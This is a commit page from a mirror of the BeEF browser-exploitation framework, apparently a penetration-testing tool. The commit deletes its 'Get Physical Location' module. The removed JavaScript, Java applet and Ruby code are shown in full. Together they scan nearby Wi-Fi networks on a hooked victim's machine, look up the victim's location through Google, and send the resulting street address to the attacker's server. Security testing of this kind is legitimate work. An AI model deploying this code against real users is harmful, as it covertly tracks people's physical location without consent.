Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Remote Get Physical Location module

Browse Source
This commit is contained in:
Brendan Coles
2019-05-05 12:18:41 +00:00
parent dab4288501
commit a62e502fce
6 changed files with 0 additions and 262 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
modules/host/get_physical_location/command.js
View File

@@ -1,21 +0,0 @@
/*
* Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
}
beef.dom.detachApplet('getGPSLocation');
});

17
modules/host/get_physical_location/config.yaml
View File

@@ -1,17 +0,0 @@
#
# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
get_physical_location:
enable: true
category: "Host"
name: "Get Physical Location"
description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]

BIN
modules/host/get_physical_location/getGPSLocation.class
View File

Binary file not shown.

BIN
modules/host/get_physical_location/getGPSLocation.jar
View File

Binary file not shown.

184
modules/host/get_physical_location/getGPSLocation.java
View File

@@ -1,184 +0,0 @@
/*
* Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class getGPSLocation extends Applet{
public static String result = "";
public getGPSLocation(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
result=getWindows();
} else if (isMac()) {
result=getMac();
} else {
//System.out.println("Your OS is not support!!");
}
}
public static String getWindows(){
try {
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
String signal = null;
String ssidStr = null;
while ((line = in.readLine()) != null) {
Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(2);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
}
Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
Matcher m2 = p2.matcher(line);
if(m2.find()){
bssidList.add(m2.group(2));
}
Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
Matcher m3 = p3.matcher(line);
if(m3.find()){
signal = m3.group(2);
signal = signal.replaceAll("%","");
signal = signal.replaceAll(" ","");
signal = "-"+signal;
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
try {
int j=0;
while(j<ssidList.size()){
queryString+="&wifi=mac:";
queryString+=bssidList.get(j);
queryString+="%7C";
queryString+="ssid:";
queryString+=ssidList.get(j);
queryString+="%7C";
queryString+="ss:";
queryString+=rssiList.get(j);
j++;
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return queryString;
}
public static String getMac(){
try {
Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
String ssidStr = null;
String signal = null;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
line = in.readLine();
while ((line = in.readLine()) != null) {
line = line.replaceAll("^\\s+", "");
Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(1);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
bssidList.add(m1.group(2));
signal = m1.group(3);
signal = signal.replaceAll(" ","");
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
// windows
return (os.indexOf("win") >= 0);
}
public static boolean isMac() {
String os = System.getProperty("os.name").toLowerCase();
// Mac
return (os.indexOf("mac") >= 0);
}
public static boolean isLinux() {
String os = System.getProperty("os.name").toLowerCase();
// linux or unix
return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
}
}

40
modules/host/get_physical_location/module.rb
View File

@@ -1,40 +0,0 @@
#
# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
require 'rubygems'
require 'json'
require 'open-uri'
class Get_physical_location < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
end
def post_execute
results = @datastore['results'].to_s
results = results.gsub("location_info=","")
response = open(results).read
result = JSON.parse(response)
reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
googleResults = open(reverseGoogleUrl).read
jsonGoogleResults = JSON.parse(googleResults)
addressFound = jsonGoogleResults['Placemark'][0]['address']
writeToResults = Hash.new
writeToResults['data'] = addressFound
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults, 0)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
content = {}
content['Result'] = addressFound
save content
end
end